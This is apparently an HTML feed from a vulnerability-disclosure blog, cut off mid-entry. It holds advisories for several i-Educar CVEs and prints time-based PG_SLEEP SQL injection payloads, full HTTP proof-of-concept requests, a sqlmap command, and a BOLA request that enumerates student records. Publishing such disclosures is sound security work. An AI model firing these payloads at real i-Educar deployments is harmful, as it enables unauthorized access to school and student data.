Vulnerability in <code>id</code> Parameter on <code>/module/AreaConhecimento/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9686" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9686</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/AreaConhecimento/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/AreaConhecimento/edit</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /module/AreaConhecimento/edit?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 90 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/AreaConhecimento/edit?id=3 </span></span><span class="line"><span class="cl">Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">tipoacao=Editar&id=3&instituicao=1&nome=Educa%C3%A7%C3%A3o+Infantil&secao=&ordenamento_ac= </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9686/image.png" width="1123" height="1015" srcset="/p/cve-2025-9686/image_hu_5fdd05e927141c54.png 480w, /p/cve-2025-9686/image_hu_66ab9f29ad1e9d8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="110" data-flex-basis="265px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9687/ https://www.cvehunters.com/p/cve-2025-9687/ <h2 id="cve-2025-9687-broken-object-level-authorization-bola-allows-enumeration-of-students-via-modulehistoricoescolarprocessamentoapi">CVE-2025-9687: Broken Object Level Authorization (BOLA) allows enumeration of students via <code>/module/HistoricoEscolar/processamentoApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9687" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9687</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/HistoricoEscolar/processamentoApi</code> endpoint of the i-Educar application. This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (<code>matriculas</code>) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</br></b><code>GET /module/HistoricoEscolar/processamentoApi</code></br></br>The application fails to enforce<b>object-level authorization</b>when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.</p><h2 id="cve-2025-9687-broken-object-level-authorization-bola-allows-enumeration-of-students-via-modulehistoricoescolarprocessamentoapi">CVE-2025-9687: Broken Object Level Authorization (BOLA) allows enumeration of students via <code>/module/HistoricoEscolar/processamentoApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9687" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9687</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/HistoricoEscolar/processamentoApi</code> endpoint of the i-Educar application. This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (<code>matriculas</code>) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</br></b><code>GET /module/HistoricoEscolar/processamentoApi</code></br></br>The application fails to enforce<b>object-level authorization</b>when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user (e.g., student, professor).</li></ul></p> <p><img src="/p/cve-2025-9687/image.png" width="1336" height="537" srcset="/p/cve-2025-9687/image_hu_f939c8d7ab530bb6.png 480w, /p/cve-2025-9687/image_hu_8ff6dd6f967a559d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="597px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/HistoricoEscolar/processamentoApi?att=matriculas&oper=get&instituicao_id=1&escola_id=4&curso_id=3&serie_id=5&turma_id=23&ano=2025&busca=S HTTP/1.1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=<low-privileged-session> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9687/image-1.png" width="1567" height="714" srcset="/p/cve-2025-9687/image-1_hu_226565e8d4a9024e.png 480w, /p/cve-2025-9687/image-1_hu_ac9f38053b5efe51.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="219" data-flex-basis="526px" /></p> <p style="text-align: justify;"><ul><li>We could observe that information about the students were returned.</li></ul></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to: <ul> <li>Unauthorized access to sensitive PII;</li> <li>Violation of data protection laws (e.g., LGPD, GDPR);</li> <li>Potential abuse of user data or impersonation;</li> <li>User enumeration.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9606/ https://www.cvehunters.com/p/cve-2025-9606/ <h2 id="cve-2025-9606-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agenda_preferenciasphp-endpoint">CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in <code>cod_agenda</code> Parameter on <code>agenda_preferencias.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9606</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cod_agenda</code> parameter of the <code>agenda_preferencias.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cod_agenda</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9606-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agenda_preferenciasphp-endpoint">CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in <code>cod_agenda</code> Parameter on <code>agenda_preferencias.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9606</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cod_agenda</code> parameter of the <code>agenda_preferencias.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cod_agenda</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>agenda_preferencias.php</code></p> <p>Parameter: <code>cod_agenda</code></p> <h3 id="command">Command: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /intranet/agenda_preferencias.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 60 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/agenda_preferencias.php </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9606/image.png" width="806" height="1023" srcset="/p/cve-2025-9606/image_hu_c74740e10125555c.png 480w, /p/cve-2025-9606/image_hu_f0d4a2c4c2aae934.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="78" data-flex-basis="189px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9607/ https://www.cvehunters.com/p/cve-2025-9607/ <h2 id="cve-2025-9607-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoview-endpoint">CVE-2025-9607: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/TabelaArredondamento/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9607</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/TabelaArredondamento/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9607-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoview-endpoint">CVE-2025-9607: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/TabelaArredondamento/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9607</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/TabelaArredondamento/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/TabelaArredondamento/view</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/TabelaArredondamento/view?id=1'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/TabelaArredondamento/index?tipo_nota=1 </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9607/image.png" width="1118" height="1020" srcset="/p/cve-2025-9607/image_hu_cf5abac93c459033.png 480w, /p/cve-2025-9607/image_hu_36a33a0596047057.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="109" data-flex-basis="263px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9608/ https://www.cvehunters.com/p/cve-2025-9608/ <h2 id="cve-2025-9608-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaview-endpoint">CVE-2025-9608: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/FormulaMedia/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9608</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/FormulaMedia/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9608-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaview-endpoint">CVE-2025-9608: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/FormulaMedia/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9608</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/FormulaMedia/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/FormulaMedia/view</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/FormulaMedia/view?id=1%27+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+%27WqeR%27=%27WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9608/image.png" width="1127" height="1015" srcset="/p/cve-2025-9608/image_hu_2f4a07eb87effb6.png 480w, /p/cve-2025-9608/image_hu_4a2882fae48dd050.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="266px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9609/ https://www.cvehunters.com/p/cve-2025-9609/ <h2 